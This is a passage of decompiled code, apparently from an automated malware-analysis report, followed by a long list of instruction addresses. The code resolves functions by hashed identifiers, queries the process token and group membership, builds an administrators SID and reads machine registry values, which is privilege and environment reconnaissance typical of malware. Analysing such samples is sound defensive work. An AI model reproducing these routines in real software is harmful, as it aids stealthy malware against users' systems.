					 *_t405 = (_t296 & 0x000000ff) + ((_t295 & 0x000000ff) << 4) - 0x50;
					_t162 = E1001101C(_t405);
					 *((intOrPtr*)(_t430 + 0x198)) = 0;
					 *((char*)( *0x1001d1f8 + 0xb)) = _t162;
					_t364 = E10013044(0x8b9d0da7, 0x8335dc52, _t162, _t162);
					if(_t364 == 0) {
						L12:
						_t365 = 0;
						L13:
						 *((char*)( *0x1001d1f8 + 0x28)) = _t365;
						if( *((intOrPtr*)(E10010754(0))) >= 0x10) {
							_push(6);
							memcpy(_t430 + 0x164, 0x1001bce0, 0 << 2);
							_t430 = _t430 + 0xc;
							 *((intOrPtr*)(_t430 + 0x1c)) = 0;
							E1000F5A8(_t430 + 0x24, 0);
							_t407 = 0;
							__eflags = 0;
							do {
								E1000F84C(_t430 + 0x24, E1000F4F0(_t430 + 0x20) + 4);
								 *((intOrPtr*)(E1000F4E0(_t430 + 0x24, E1000F4F0(_t430 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t430 + 0x164 + _t407 * 4));
								_t407 = _t407 + 1;
								 *((intOrPtr*)(_t430 + 0x1c)) =  *((intOrPtr*)(_t430 + 0x1c)) + 1;
								__eflags = _t407 - 6;
							} while (_t407 < 6);
							_push(0);
							E10015558(_t430 + 0xc, _t430 + 0x1c, 0x80000002);
							E1000F678(_t430 + 0x20);
							E10015588(_t430 + 8, _t430 + 0x1c0, 0x5e9822cf);
							_t180 = E1001583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c0)));
							_t408 = _t180;
							E1000DFDC(_t430 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E10015588(_t430 + 8, _t430 + 0x1c8, 0x80c4a2b7);
								_t421 = E1001583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c8)));
								E1000DFDC(_t430 + 0x1c8);
								_t408 = _t430 + 0x1d0;
								E10015588(_t430 + 8, _t430 + 0x1d0, 0xa89c042f);
								_t402 = E1001583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1d0)));
								E1000DFDC(_t430 + 0x1d0);
								__eflags = _t421;
								if(_t421 != 0) {
									__eflags = _t421 - 5;
									if(_t421 != 5) {
										__eflags = _t421 - 2;
										if(_t421 != 2) {
											L58:
											E1000D020(_t430 + 0xc);
											__eflags =  *((char*)(_t430 + 8));
											if( *((char*)(_t430 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t430 + 4)) = 0;
												goto L66;
											}
											_t383 =  *((intOrPtr*)(_t430 + 4));
											__eflags = _t383;
											if(_t383 == 0) {
												L61:
												_t239 = 1;
												L63:
												__eflags = _t239;
												if(_t239 == 0) {
													E10015530(_t383);
												}
												goto L65;
											}
											__eflags = _t383 - 0xffffffff;
											if(_t383 != 0xffffffff) {
												_t239 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t402 - 1;
										if(_t402 != 1) {
											goto L58;
										}
										E1000D020(_t430 + 0xc);
										__eflags =  *((char*)(_t430 + 8));
										if( *((char*)(_t430 + 8)) == 0) {
											L57:
											 *((intOrPtr*)(_t430 + 4)) = 0;
											_t189 = 5;
											goto L66;
										}
										_t384 =  *((intOrPtr*)(_t430 + 4));
										__eflags = _t384;
										if(_t384 == 0) {
											L53:
											_t242 = 1;
											L55:
											__eflags = _t242;
											if(_t242 == 0) {
												E10015530(_t384);
											}
											goto L57;
										}
										__eflags = _t384 - 0xffffffff;
										if(_t384 != 0xffffffff) {
											_t242 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t402;
									if(_t402 != 0) {
										__eflags = _t402 - 1;
										if(_t402 == 1) {
											E1000D020(_t430 + 0xc);
											__eflags =  *((char*)(_t430 + 8));
											if( *((char*)(_t430 + 8)) == 0) {
												L121:
												 *((intOrPtr*)(_t430 + 4)) = 0;
												_t189 = 4;
												goto L66;
											}
											_t385 =  *((intOrPtr*)(_t430 + 4));
											__eflags = _t385;
											if(_t385 == 0) {
												L117:
												_t245 = 1;
												L119:
												__eflags = _t245;
												if(_t245 == 0) {
													E10015530(_t385);
												}
												goto L121;
											}
											__eflags = _t385 - 0xffffffff;
											if(_t385 != 0xffffffff) {
												_t245 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E1000D020(_t430 + 0xc);
									__eflags =  *((char*)(_t430 + 8));
									if( *((char*)(_t430 + 8)) == 0) {
										L45:
										 *((intOrPtr*)(_t430 + 4)) = 0;
										_t189 = 3;
										goto L66;
									}
									_t386 =  *((intOrPtr*)(_t430 + 4));
									__eflags = _t386;
									if(_t386 == 0) {
										L41:
										_t248 = 1;
										L43:
										__eflags = _t248;
										if(_t248 == 0) {
											E10015530(_t386);
										}
										goto L45;
									}
									__eflags = _t386 - 0xffffffff;
									if(_t386 != 0xffffffff) {
										_t248 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t402;
								if(_t402 != 0) {
									goto L58;
								}
								E1000D020(_t430 + 0xc);
								__eflags =  *((char*)(_t430 + 8));
								if( *((char*)(_t430 + 8)) == 0) {
									L35:
									 *((intOrPtr*)(_t430 + 4)) = 0;
									_t189 = 2;
									goto L66;
								}
								_t387 =  *((intOrPtr*)(_t430 + 4));
								__eflags = _t387;
								if(_t387 == 0) {
									L31:
									_t251 = 1;
									L33:
									__eflags = _t251;
									if(_t251 == 0) {
										E10015530(_t387);
									}
									goto L35;
								}
								__eflags = _t387 - 0xffffffff;
								if(_t387 != 0xffffffff) {
									_t251 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E1000D020(_t430 + 0xc);
							__eflags =  *((char*)(_t430 + 8));
							if( *((char*)(_t430 + 8)) == 0) {
								L25:
								 *((intOrPtr*)(_t430 + 4)) = 0;
								_t189 = 1;
								goto L66;
							}
							_t388 =  *((intOrPtr*)(_t430 + 4));
							__eflags = _t388;
							if(_t388 == 0) {
								L21:
								_t255 = 1;
								L23:
								__eflags = _t255;
								if(_t255 == 0) {
									E10015530(_t388);
								}
								goto L25;
							}
							__eflags = _t388 - 0xffffffff;
							if(_t388 != 0xffffffff) {
								_t255 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x1001d1f8 + 0x24)) = _t189;
							_t190 = E10011054(0xffffffffffffffff);
							_t321 =  *0x1001d1f8;
							 *((char*)(_t321 + 0x29)) = _t190;
							 *((intOrPtr*)(_t321 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t321 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = E100110C8(0xffffffffffffffff);
								L78:
								_t370 = E10013044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545);
								if(_t370 != 0) {
									 *_t370(_t430 + 0x164);
								}
								_t196 =  *0x1001d1f8;
								_t292 = _t430 + 0x178;
								_t410 = _t430 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t292;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t292 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t292 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t410;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t410 + 0x10));
								return _t196;
							}
							 *((intOrPtr*)(_t430 + 0x19c)) = 0;
							_t373 = E10013044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
							if(_t373 == 0) {
								L74:
								_t201 =  *0x1001d1f8;
								if( *((char*)(_t201 + 0x28)) == 0) {
									 *((intOrPtr*)(_t201 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t201 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t430 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t373() == 0) {
								_t204 = E100135C8(_t408);
								__eflags = _t204;
								if(_t204 != 0) {
									goto L74;
								}
							}
							 *((intOrPtr*)(_t430 + 0x30)) =  *((intOrPtr*)(_t430 + 0x19c));
							 *((char*)(_t430 + 0x34)) = 1;
							 *((intOrPtr*)(_t430 + 0x1a4)) = 0;
							_t326 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
							if(_t326 != 0) {
								_push(_t430 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *((intOrPtr*)(_t430 + 0x1ac)));
								if( *_t326() == 0) {
									E100135C8(_t408);
								}
							}
							_t207 =  *((intOrPtr*)(_t430 + 0x1a4));
							if( *((intOrPtr*)(_t430 + 0x1a4)) != 0) {
								E1000F5A8(_t430 + 0x18c, _t207);
								_t412 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t412;
								if(_t412 == 0) {
									L133:
									E1000F678(_t430 + 0x188);
									goto L72;
								}
								_t213 = E1000F4E0(_t430 + 0x18c, 0);
								_t214 = E1000F4F0(_t430 + 0x188);
								_t216 =  *_t412( *((intOrPtr*)(_t430 + 0x1ac)), 1, _t213, _t214, _t430 + 0x1a4);
								__eflags = _t216;
								if(_t216 == 0) {
									_t217 = E100135C8(_t412);
									__eflags = _t217;
									if(_t217 != 0) {
										goto L133;
									}
								}
								_t424 = E1000F4E0(_t430 + 0x18c, 0);
								E1000DF84(_t430 + 0x1b4, 0);
								 *((intOrPtr*)(_t430 + 0x1ac)) = 0;
								_t378 = E10013044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t378;
								if(_t378 != 0) {
									 *_t378( *_t424, _t430 + 0x1ac);
								}
								E1000DFF8(_t430 + 0x1b4,  *((intOrPtr*)(_t430 + 0x1ac)));
								_t224 = E10013044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
								__eflags = _t224;
								if(_t224 != 0) {
									_push( *((intOrPtr*)(_t430 + 0x1ac)));
									asm("int3");
									asm("int3");
								}
								E1000E0A4(_t430 + 0x1b8 - 8, _t430 + 0x1b8);
								_t426 = E10014FD4( *((intOrPtr*)(_t430 + 0x1b8)), E1000E8D4( *((intOrPtr*)(_t430 + 0x1b8)), 0x7fffffff));
								E1000DFDC(_t430 + 0x1b8);
								E1000DFDC(_t430 + 0x1b0);
								E1000F678(_t430 + 0x188);
								__eflags =  *((char*)(_t430 + 0x34));
								if( *((char*)(_t430 + 0x34)) != 0) {
									E1000BB88(_t430 + 0x30);
								}
								__eflags = _t426 - 0x6df4cf7;
								if(_t426 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t430 + 0x34)) != 0) {
									E1000BB88(_t430 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t430 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t364() == 0) {
						_t260 = E100135C8(_t405);
						__eflags = _t260;
						if(_t260 != 0) {
							goto L12;
						}
					}
					 *((intOrPtr*)(_t430 + 0x14)) =  *((intOrPtr*)(_t430 + 0x198));
					 *((char*)(_t430 + 0x18)) = 1;
					 *((intOrPtr*)(_t430 + 0x1a0)) = 0;
					_t348 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
					if(_t348 != 0) {
						_push(_t430 + 0x1a0);
						_push(0);
						_push(0);
						_push(2);
						_push( *((intOrPtr*)(_t430 + 0x1a8)));
						if( *_t348() == 0) {
							E100135C8(_t405);
						}
					}
					_t263 =  *((intOrPtr*)(_t430 + 0x1a0));
					if( *((intOrPtr*)(_t430 + 0x1a0)) != 0) {
						E1000F5A8(_t430 + 0x3c, _t263);
						_t408 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t408;
						if(_t408 == 0) {
							L107:
							E1000F678(_t430 + 0x38);
							goto L10;
						}
						_t269 = E1000F4E0(_t430 + 0x3c, 0);
						_t270 = E1000F4F0(_t430 + 0x38);
						_t272 =  *_t408( *((intOrPtr*)(_t430 + 0x1a8)), 2, _t269, _t270, _t430 + 0x1a0);
						__eflags = _t272;
						if(_t272 == 0) {
							_t273 = E100135C8(_t408);
							__eflags = _t273;
							if(_t273 != 0) {
								goto L107;
							}
						}
						_t428 = E1000F4E0(_t430 + 0x3c, 0);
						 *((intOrPtr*)(_t430 + 0x1d8 - 0x30)) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t408 = E10013044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t408;
						if(_t408 == 0) {
							goto L107;
						}
						_t277 = _t430 + 0x1a8;
						_t278 =  *_t408(_t277 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t277);
						__eflags = _t278;
						if(_t278 == 0) {
							_t279 = E100135C8(_t408);
							__eflags = _t279;
							if(_t279 != 0) {
								goto L107;
							}
						}
						_t404 =  *((intOrPtr*)(_t430 + 0x1a8));
						__eflags =  *_t428;
						if( *_t428 <= 0) {
							L101:
							__eflags = _t404;
							if(_t404 == 0) {
								L103:
								_t394 = 1;
								L105:
								__eflags = _t394;
								if(_t394 == 0) {
									E10010FF8(_t404, _t408, _t404);
								}
								goto L107;
							}
							__eflags = _t404 - 0xffffffff;
							if(_t404 != 0xffffffff) {
								_t394 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t414 = 0;
						__eflags = 0;
						do {
							_t283 = E10013044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
							__eflags = _t283;
							if(_t283 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t428 + 4 + _t414 * 8)));
							_push( *((intOrPtr*)(_t430 + 0x1ac)));
							asm("int3");
							asm("int3");
							__eflags = _t283;
							if(_t283 == 0) {
								goto L100;
							}
							__eflags = _t404;
							if(_t404 == 0) {
								L93:
								_t396 = 1;
								L95:
								__eflags = _t396;
								if(_t396 == 0) {
									E10010FF8(_t404, _t414, _t404);
								}
								E1000F678(_t430 + 0x38);
								__eflags =  *((char*)(_t430 + 0x18));
								if( *((char*)(_t430 + 0x18)) != 0) {
									E1000BB88(_t430 + 0x14);
								}
								_t365 = 1;
								goto L13;
							}
							__eflags = _t404 - 0xffffffff;
							if(_t404 != 0xffffffff) {
								_t396 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t414 = _t414 + 1;
							__eflags = _t414 -  *_t428;
						} while (_t414 <  *_t428);
						goto L101;
					}
					L10:
					if( *((char*)(_t430 + 0x18)) != 0) {
						E1000BB88(_t430 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}



































































                                                                                                        0x10010763
                                                                                                        0x10010765
                                                                                                        0x1001076c
                                                                                                        0x10010feb
                                                                                                        0x10010ff1
                                                                                                        0x10010ff1
                                                                                                        0x10010776
                                                                                                        0x10010782
                                                                                                        0x1001078e
                                                                                                        0x10010793
                                                                                                        0x100107a0
                                                                                                        0x100107b1
                                                                                                        0x100107b3
                                                                                                        0x100107b4
                                                                                                        0x100107b5
                                                                                                        0x100107b5
                                                                                                        0x100107b6
                                                                                                        0x100107ba
                                                                                                        0x100107be
                                                                                                        0x100107c3
                                                                                                        0x100107c6
                                                                                                        0x100107cc
                                                                                                        0x100107e6
                                                                                                        0x100107ed
                                                                                                        0x100107f0
                                                                                                        0x100107f3
                                                                                                        0x100107f5
                                                                                                        0x10010801
                                                                                                        0x1001080e
                                                                                                        0x1001081b
                                                                                                        0x1001081f
                                                                                                        0x100108ab
                                                                                                        0x100108ab
                                                                                                        0x100108ad
                                                                                                        0x100108b1
                                                                                                        0x100108bc
                                                                                                        0x100108d2
                                                                                                        0x100108d5
                                                                                                        0x100108d5
                                                                                                        0x100108d9
                                                                                                        0x100108e2
                                                                                                        0x100108e7
                                                                                                        0x100108e7
                                                                                                        0x100108e9
                                                                                                        0x100108fa
                                                                                                        0x1001091c
                                                                                                        0x1001091e
                                                                                                        0x1001091f
                                                                                                        0x10010923
                                                                                                        0x10010923
                                                                                                        0x1001092c
                                                                                                        0x10010938
                                                                                                        0x10010941
                                                                                                        0x10010957
                                                                                                        0x10010967
                                                                                                        0x1001096c
                                                                                                        0x10010970
                                                                                                        0x10010975
                                                                                                        0x10010977
                                                                                                        0x100109c7
                                                                                                        0x100109dc
                                                                                                        0x100109e0
                                                                                                        0x100109e5
                                                                                                        0x100109f6
                                                                                                        0x10010a0b
                                                                                                        0x10010a0f
                                                                                                        0x10010a14
                                                                                                        0x10010a16
                                                                                                        0x10010a5d
                                                                                                        0x10010a60
                                                                                                        0x10010aae
                                                                                                        0x10010ab1
                                                                                                        0x10010af2
                                                                                                        0x10010af6
                                                                                                        0x10010afb
                                                                                                        0x10010b00
                                                                                                        0x10010b1f
                                                                                                        0x10010b1f
                                                                                                        0x10010b1f
                                                                                                        0x10010b21
                                                                                                        0x00000000
                                                                                                        0x10010b21
                                                                                                        0x10010b02
                                                                                                        0x10010b06
                                                                                                        0x10010b08
                                                                                                        0x10010b0f
                                                                                                        0x10010b0f
                                                                                                        0x10010b15
                                                                                                        0x10010b15
                                                                                                        0x10010b17
                                                                                                        0x10010b1a
                                                                                                        0x10010b1a
                                                                                                        0x00000000
                                                                                                        0x10010b17
                                                                                                        0x10010b0a
                                                                                                        0x10010b0d
                                                                                                        0x10010b13
                                                                                                        0x10010b13
                                                                                                        0x00000000
                                                                                                        0x10010b13
                                                                                                        0x00000000
                                                                                                        0x10010b0d
                                                                                                        0x10010ab3
                                                                                                        0x10010ab6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010abc
                                                                                                        0x10010ac1
                                                                                                        0x10010ac6
                                                                                                        0x10010ae5
                                                                                                        0x10010ae5
                                                                                                        0x10010aef
                                                                                                        0x00000000
                                                                                                        0x10010aef
                                                                                                        0x10010ac8
                                                                                                        0x10010acc
                                                                                                        0x10010ace
                                                                                                        0x10010ad5
                                                                                                        0x10010ad5
                                                                                                        0x10010adb
                                                                                                        0x10010adb
                                                                                                        0x10010add
                                                                                                        0x10010ae0
                                                                                                        0x10010ae0
                                                                                                        0x00000000
                                                                                                        0x10010add
                                                                                                        0x10010ad0
                                                                                                        0x10010ad3
                                                                                                        0x10010ad9
                                                                                                        0x10010ad9
                                                                                                        0x00000000
                                                                                                        0x10010ad9
                                                                                                        0x00000000
                                                                                                        0x10010ad3
                                                                                                        0x10010a62
                                                                                                        0x10010a64
                                                                                                        0x10010aa3
                                                                                                        0x10010aa6
                                                                                                        0x10010e18
                                                                                                        0x10010e1d
                                                                                                        0x10010e22
                                                                                                        0x10010e41
                                                                                                        0x10010e41
                                                                                                        0x10010e4b
                                                                                                        0x00000000
                                                                                                        0x10010e4b
                                                                                                        0x10010e24
                                                                                                        0x10010e28
                                                                                                        0x10010e2a
                                                                                                        0x10010e31
                                                                                                        0x10010e31
                                                                                                        0x10010e37
                                                                                                        0x10010e37
                                                                                                        0x10010e39
                                                                                                        0x10010e3c
                                                                                                        0x10010e3c
                                                                                                        0x00000000
                                                                                                        0x10010e39
                                                                                                        0x10010e2c
                                                                                                        0x10010e2f
                                                                                                        0x10010e35
                                                                                                        0x10010e35
                                                                                                        0x00000000
                                                                                                        0x10010e35
                                                                                                        0x00000000
                                                                                                        0x10010e2f
                                                                                                        0x00000000
                                                                                                        0x10010aac
                                                                                                        0x10010a6a
                                                                                                        0x10010a6f
                                                                                                        0x10010a74
                                                                                                        0x10010a93
                                                                                                        0x10010a93
                                                                                                        0x10010a9d
                                                                                                        0x00000000
                                                                                                        0x10010a9d
                                                                                                        0x10010a76
                                                                                                        0x10010a7a
                                                                                                        0x10010a7c
                                                                                                        0x10010a83
                                                                                                        0x10010a83
                                                                                                        0x10010a89
                                                                                                        0x10010a89
                                                                                                        0x10010a8b
                                                                                                        0x10010a8e
                                                                                                        0x10010a8e
                                                                                                        0x00000000
                                                                                                        0x10010a8b
                                                                                                        0x10010a7e
                                                                                                        0x10010a81
                                                                                                        0x10010a87
                                                                                                        0x10010a87
                                                                                                        0x00000000
                                                                                                        0x10010a87
                                                                                                        0x00000000
                                                                                                        0x10010a81
                                                                                                        0x10010a18
                                                                                                        0x10010a1a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010a24
                                                                                                        0x10010a29
                                                                                                        0x10010a2e
                                                                                                        0x10010a4d
                                                                                                        0x10010a4d
                                                                                                        0x10010a57
                                                                                                        0x00000000
                                                                                                        0x10010a57
                                                                                                        0x10010a30
                                                                                                        0x10010a34
                                                                                                        0x10010a36
                                                                                                        0x10010a3d
                                                                                                        0x10010a3d
                                                                                                        0x10010a43
                                                                                                        0x10010a43
                                                                                                        0x10010a45
                                                                                                        0x10010a48
                                                                                                        0x10010a48
                                                                                                        0x00000000
                                                                                                        0x10010a45
                                                                                                        0x10010a38
                                                                                                        0x10010a3b
                                                                                                        0x10010a41
                                                                                                        0x10010a41
                                                                                                        0x00000000
                                                                                                        0x10010a41
                                                                                                        0x00000000
                                                                                                        0x10010a3b
                                                                                                        0x1001097d
                                                                                                        0x10010982
                                                                                                        0x10010987
                                                                                                        0x100109a6
                                                                                                        0x100109a6
                                                                                                        0x100109b0
                                                                                                        0x00000000
                                                                                                        0x100109b0
                                                                                                        0x10010989
                                                                                                        0x1001098d
                                                                                                        0x1001098f
                                                                                                        0x10010996
                                                                                                        0x10010996
                                                                                                        0x1001099c
                                                                                                        0x1001099c
                                                                                                        0x1001099e
                                                                                                        0x100109a1
                                                                                                        0x100109a1
                                                                                                        0x00000000
                                                                                                        0x1001099e
                                                                                                        0x10010991
                                                                                                        0x10010994
                                                                                                        0x1001099a
                                                                                                        0x1001099a
                                                                                                        0x00000000
                                                                                                        0x1001099a
                                                                                                        0x00000000
                                                                                                        0x100108be
                                                                                                        0x100108c0
                                                                                                        0x10010b25
                                                                                                        0x10010b2a
                                                                                                        0x10010b2d
                                                                                                        0x10010b32
                                                                                                        0x10010b34
                                                                                                        0x10010b49
                                                                                                        0x10010b4c
                                                                                                        0x10010c1a
                                                                                                        0x10010c22
                                                                                                        0x10010c25
                                                                                                        0x10010c36
                                                                                                        0x10010c3a
                                                                                                        0x10010c44
                                                                                                        0x10010c44
                                                                                                        0x10010c46
                                                                                                        0x10010c48
                                                                                                        0x10010c57
                                                                                                        0x10010c63
                                                                                                        0x10010c67
                                                                                                        0x10010c6a
                                                                                                        0x10010c6d
                                                                                                        0x10010c70
                                                                                                        0x00000000
                                                                                                        0x10010c70
                                                                                                        0x10010b5c
                                                                                                        0x10010b6e
                                                                                                        0x10010b72
                                                                                                        0x10010bfe
                                                                                                        0x10010bfe
                                                                                                        0x10010c04
                                                                                                        0x10010c0f
                                                                                                        0x10010c06
                                                                                                        0x10010c06
                                                                                                        0x10010c06
                                                                                                        0x00000000
                                                                                                        0x10010c04
                                                                                                        0x10010b7f
                                                                                                        0x10010b80
                                                                                                        0x10010b82
                                                                                                        0x10010b88
                                                                                                        0x10010fd7
                                                                                                        0x10010fdc
                                                                                                        0x10010fde
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010fe4
                                                                                                        0x10010b9f
                                                                                                        0x10010ba3
                                                                                                        0x10010ba8
                                                                                                        0x10010bba
                                                                                                        0x10010bbe
                                                                                                        0x10010bc9
                                                                                                        0x10010bca
                                                                                                        0x10010bcb
                                                                                                        0x10010bcc
                                                                                                        0x10010bce
                                                                                                        0x10010bd9
                                                                                                        0x10010e51
                                                                                                        0x10010e51
                                                                                                        0x10010bd9
                                                                                                        0x10010bdf
                                                                                                        0x10010be8
                                                                                                        0x10010e63
                                                                                                        0x10010e79
                                                                                                        0x10010e7b
                                                                                                        0x10010e7d
                                                                                                        0x10010fb8
                                                                                                        0x10010fbf
                                                                                                        0x00000000
                                                                                                        0x10010fbf
                                                                                                        0x10010e8c
                                                                                                        0x10010e9a
                                                                                                        0x10010eb4
                                                                                                        0x10010eb6
                                                                                                        0x10010eb8
                                                                                                        0x10010fc9
                                                                                                        0x10010fce
                                                                                                        0x10010fd0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010fd2
                                                                                                        0x10010ecc
                                                                                                        0x10010ed7
                                                                                                        0x10010ee6
                                                                                                        0x10010ef8
                                                                                                        0x10010efa
                                                                                                        0x10010efc
                                                                                                        0x10010f09
                                                                                                        0x10010f09
                                                                                                        0x10010f19
                                                                                                        0x10010f2a
                                                                                                        0x10010f2f
                                                                                                        0x10010f31
                                                                                                        0x10010f33
                                                                                                        0x10010f3a
                                                                                                        0x10010f3b
                                                                                                        0x10010f3b
                                                                                                        0x10010f47
                                                                                                        0x10010f68
                                                                                                        0x10010f71
                                                                                                        0x10010f7d
                                                                                                        0x10010f89
                                                                                                        0x10010f8e
                                                                                                        0x10010f93
                                                                                                        0x10010f99
                                                                                                        0x10010f99
                                                                                                        0x10010f9e
                                                                                                        0x10010fa4
                                                                                                        0x00000000
                                                                                                        0x10010faa
                                                                                                        0x10010fac
                                                                                                        0x00000000
                                                                                                        0x10010fac
                                                                                                        0x10010bee
                                                                                                        0x10010bee
                                                                                                        0x10010bf3
                                                                                                        0x10010bf9
                                                                                                        0x10010bf9
                                                                                                        0x00000000
                                                                                                        0x10010bf3
                                                                                                        0x10010be8
                                                                                                        0x100108bc
                                                                                                        0x1001082c
                                                                                                        0x1001082d
                                                                                                        0x1001082f
                                                                                                        0x10010835
                                                                                                        0x10010e02
                                                                                                        0x10010e07
                                                                                                        0x10010e09
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010e0f
                                                                                                        0x1001084c
                                                                                                        0x10010850
                                                                                                        0x10010855
                                                                                                        0x10010867
                                                                                                        0x1001086b
                                                                                                        0x10010876
                                                                                                        0x10010877
                                                                                                        0x10010878
                                                                                                        0x10010879
                                                                                                        0x1001087b
                                                                                                        0x10010886
                                                                                                        0x10010c7e
                                                                                                        0x10010c7e
                                                                                                        0x10010886
                                                                                                        0x1001088c
                                                                                                        0x10010895
                                                                                                        0x10010c8d
                                                                                                        0x10010ca3
                                                                                                        0x10010ca5
                                                                                                        0x10010ca7
                                                                                                        0x10010dd8
                                                                                                        0x10010ddc
                                                                                                        0x00000000
                                                                                                        0x10010ddc
                                                                                                        0x10010cb3
                                                                                                        0x10010cbe
                                                                                                        0x10010cd8
                                                                                                        0x10010cda
                                                                                                        0x10010cdc
                                                                                                        0x10010df4
                                                                                                        0x10010df9
                                                                                                        0x10010dfb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010dfd
                                                                                                        0x10010ced
                                                                                                        0x10010cfb
                                                                                                        0x10010d02
                                                                                                        0x10010d03
                                                                                                        0x10010d04
                                                                                                        0x10010d16
                                                                                                        0x10010d18
                                                                                                        0x10010d1a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010d22
                                                                                                        0x10010d3d
                                                                                                        0x10010d3f
                                                                                                        0x10010d41
                                                                                                        0x10010de6
                                                                                                        0x10010deb
                                                                                                        0x10010ded
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010def
                                                                                                        0x10010d47
                                                                                                        0x10010d4e
                                                                                                        0x10010d52
                                                                                                        0x10010dbd
                                                                                                        0x10010dbd
                                                                                                        0x10010dbf
                                                                                                        0x10010dc6
                                                                                                        0x10010dc6
                                                                                                        0x10010dcc
                                                                                                        0x10010dcc
                                                                                                        0x10010dce
                                                                                                        0x10010dd3
                                                                                                        0x10010dd3
                                                                                                        0x00000000
                                                                                                        0x10010dce
                                                                                                        0x10010dc1
                                                                                                        0x10010dc4
                                                                                                        0x10010dca
                                                                                                        0x10010dca
                                                                                                        0x00000000
                                                                                                        0x10010dca
                                                                                                        0x00000000
                                                                                                        0x10010dc4
                                                                                                        0x10010d54
                                                                                                        0x10010d54
                                                                                                        0x10010d56
                                                                                                        0x10010d62
                                                                                                        0x10010d67
                                                                                                        0x10010d69
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010d6b
                                                                                                        0x10010d6f
                                                                                                        0x10010d76
                                                                                                        0x10010d77
                                                                                                        0x10010d78
                                                                                                        0x10010d7a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010d7c
                                                                                                        0x10010d7e
                                                                                                        0x10010d85
                                                                                                        0x10010d85
                                                                                                        0x10010d8b
                                                                                                        0x10010d8b
                                                                                                        0x10010d8d
                                                                                                        0x10010d92
                                                                                                        0x10010d92
                                                                                                        0x10010d9b
                                                                                                        0x10010da0
                                                                                                        0x10010da5
                                                                                                        0x10010dab
                                                                                                        0x10010dab
                                                                                                        0x10010db0
                                                                                                        0x00000000
                                                                                                        0x10010db0
                                                                                                        0x10010d80
                                                                                                        0x10010d83
                                                                                                        0x10010d89
                                                                                                        0x10010d89
                                                                                                        0x00000000
                                                                                                        0x10010d89
                                                                                                        0x00000000
                                                                                                        0x10010db7
                                                                                                        0x10010db7
                                                                                                        0x10010db8
                                                                                                        0x10010db8
                                                                                                        0x00000000
                                                                                                        0x10010d56
                                                                                                        0x1001089b
                                                                                                        0x100108a0
                                                                                                        0x100108a6
                                                                                                        0x100108a6
                                                                                                        0x00000000
                                                                                                        0x10010c7d
                                                                                                        0x10010c7d
                                                                                                        0x10010c7d

                                                                                                        Strings
                                                                                                        Memory Dump Source
